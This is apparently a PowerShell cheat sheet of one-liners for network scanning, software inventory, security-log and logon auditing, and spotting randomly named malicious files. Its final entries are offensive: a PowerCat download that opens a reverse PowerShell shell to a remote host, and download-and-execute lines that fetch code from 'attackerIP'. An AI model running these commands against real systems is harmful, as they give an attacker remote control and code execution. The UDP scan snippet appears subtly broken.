Simple Ping Sweep
Copy 2..254 | Foreach-Object { Test-Connection -ComputerName XXX.XXX.XXX.$_} Each host scans for its neighbours ($ComputerList in this instance would refer to a variable created to reference a text file with a list of computer names in it)
Copy $Results = Invoke-Command - ComputerName $ComputerList -ScriptBlock { Get-NetNeighbor -AddressFamily IPv4 | Where-Object {$_.LinkLayerAddress -notlike "01-00-5E*" -and $_.LinkLayerAddress -notlike "FF-FF-FF-FF-FF-FF"} } Software inventory list (Can be altered to loop through a list of computers as per above)
Copy @("HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*","HKLM:\SOFTWARE\Wow6432node\Mircrosoft\Windows\CurrentVersion\Uninstall\*") | ForEach-Object { Get-ItemProperty "$_" | Select-Object DisplayName,PSChildName,Publisher,InstallLocation} Simple TCP port scan (IPv4) (1234..5678 refers to port range)
Copy $ip = @("XXX.XXX.XXX.XXX","XXX.XXX.XXX.XXX")
$ips | ForEach-Object { $ip =$_; 1234..5678 | ForEach-Object { Test-NetConnection -ComputerName $ip -Port $_ -InformationLevel Quiet }} Simple UDP port scan (IPv4)
Copy $ips = @("XXX.XXX.XXX.XXX","XXX.XXX.XXX.XXX")
$ips | ForEach-Object { $ip =$_; $UDP = New-Object System.Net.Sockets.UdpClient ($ip); $UDP.Connect($ip,$_) } Search for string in file recursively through folders and provide path of file
Copy Get-ChildItem -Recurse | Select-String "dummy" -List | Select Path Get Windows security events and group by ID count
Copy Get-Winevent -LogName Security | Group-Object -Property Id -NoElement Display all successful logons within 24 hours and provide usernames (Ensure TargetWorkstation variable exists)
Copy Invoke-Command {Get-WinEvent -FilterHashTable @{LogName="Security";Id=4624;StartTime=$((Get-Date).AddDays(-1))} | ForEach-Object {$e=[xml]$_.ToXml();$e.Event.EventData.Data[5]} | Select-Object -ExpandProperty "#text" | Group-Object -NoElement } -ComputerName $TargetWorkstation Active Directory - Search for last logon date of specified user
Copy Get-ADUser -Identity username -Properties "LastLogonDate" Find all local users who have logged in during the last 10 days (adjust (-10) to change days)
Copy Get-LocalUser | Where-Object {$_.Lastlogon -ge (Get-Date).AddDays(-10)} | Select-Object Name,Enabled,SID,Lastlogon | Format-List Method for discovering accounts logged into the most systems across the network by count (Ensure Workstations variable exists)
Copy Invoke-Command {Get-WinEvent -FilterHashTable @{LogName="Security";Id=4624} | ForEach-Object {$e=[xml]$_.ToXml();$e.Event.EventData.Data[5]} | Select-Object -ExpandProperty "#text" | Group-Object | Sort-Object -Property Count -Descending} -ComputerName $Workstations | Select-Object -Property Name | Sort-Object -Descending -Property Count Detect randomness of filename s within given directory. (See also, Security Tools List for the Freq-PS script required for this command). Method for finding malicious files with random names.
Copy . C:\Scripts\freq.ps1 #Location of freq.ps1 script
Get-ChildItem | Get-FrequencyScore -Property Name | Select-Object -Property Name,FrequencyScore | Sort-Object -Property FrequencyScore -Unique Downloading PowerCat from GitHub, then using it to open a connection to a remote server
Copy IEX (New-Object System.Net.Webclient).DownloadString
('https://raw.githubusercontent.com/besmorhino/powercat/master/powercat.ps1'); powercat -c <REMOTEIP> -p <REMOTEPORT> -e powershell The following will download and store a remote file to disk.
Copy Invoke-WebRequest -Uri "http://attackerIP/file.exe" -OutFile "C:\path\to\file.exe" The following will download and automatically execute the remote PowerShell script when ran from a command prompt.
Copy powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://attackerIP/file.ps1')“ 